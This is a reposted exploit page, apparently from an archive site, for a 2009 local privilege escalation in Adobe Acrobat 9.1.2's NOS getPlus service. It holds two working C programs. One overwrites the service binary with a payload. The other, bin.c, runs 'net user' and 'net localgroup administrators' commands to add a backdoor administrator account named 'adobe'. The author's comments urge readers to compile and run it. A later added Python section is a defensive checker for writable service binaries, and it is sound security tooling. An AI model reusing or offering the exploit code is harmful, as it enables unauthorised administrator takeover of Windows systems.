Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit
Source: 0xjbrown41@gmail.com  Author: Brown  Published: 2009-07-22
/*
alwaysdirtyneverclean.c
AKA
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
BY
Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
***********************************************************************************************************
I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the
brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting
improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2)
isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically
use to your advantage. But I tested running this code under a GUEST account and it worked pretty well (just
the first time though). Change the values as needed, compile and run. Things could be more or less silent,
lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)

Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from Adobe's download manager, then updated)

But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time.
***********************************************************************************************************
alwaysdirtyneverclean.c
*/

#include <stdio.h>
#include <windows.h>

#define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe"
#define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak"
#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe"
//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe"

int main(int argc, char *argv[])
{

     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
     // shakee and bakeee

     return 0;

}
///////////////////////////////////// cut /////////////////////////////////////

/*
bin.c
FROM
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
BY
Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
*/

#include <stdio.h>
#include <windows.h>

#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user adobe pwned /add"
#define TWO "/C net localgroup administrators adobe /add"

int main(int argc, char *argv[])
{

STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;

     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     // mmmmmmmmmmm.. chocolate brownie ice cream smoothies are goooood

     return 0;

}
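
A defender-side check for the root cause this exploit relies on: a service binary that unprivileged users can replace. This is an added example, not part of Jeremy Brown's original code. It parses `icacls` output for the service path, and the `risky_aces` helper, the principal list (English-locale names assumed) and the sample ACLs are constructed for illustration.

```python
import re

# Principals every unprivileged local user falls under (English-locale names; assumption).
LOW_PRIV = {"everyone", "builtin\\users", "builtin\\guests",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that let a holder overwrite, rename or delete the object.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "DE", "DC", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<perms>(?:\([^)]*\))+)$")

def risky_aces(path, icacls_output):
    """Return [(principal, rights)] for allow-ACEs that give low-privileged
    principals write-type access to `path`, parsed from `icacls <path>` output."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):   # first ACE shares a line with the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                                 # blank line or summary line
        tokens = {t.strip().upper() for grp in re.findall(r"\(([^)]*)\)", m["perms"])
                  for t in grp.split(",")}
        if "DENY" in tokens or "N" in tokens:
            continue                                 # deny / no-access ACEs grant nothing
        granted = sorted(tokens & WRITE_RIGHTS)
        if granted and m["who"].strip().lower() in LOW_PRIV:
            findings.append((m["who"].strip(), granted))
    return findings

# Constructed sample output; the ACLs are illustrative, not captured from a real install.
TARGET = r"C:\Program Files\NOS\bin\GetPlus_HelperSvc.exe"
WEAK = TARGET + r""" BUILTIN\Users:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files"""
HARDENED = TARGET + r""" NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for name, out in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, risky_aces(TARGET, out))
```

Run the same check against the containing directory as well, since write access there also allows the file to be renamed and replaced.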

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved